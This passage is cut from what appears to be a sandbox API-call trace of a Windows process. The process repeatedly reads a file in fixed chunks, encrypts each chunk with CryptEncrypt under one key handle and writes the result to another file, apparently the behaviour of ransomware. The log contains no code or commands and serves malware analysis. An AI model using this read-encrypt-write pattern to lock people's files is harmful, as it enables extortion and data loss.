nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.975] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.975] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.975] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.975] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.975] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.975] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.976] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.976] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.977] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.978] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.979] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.980] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.981] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 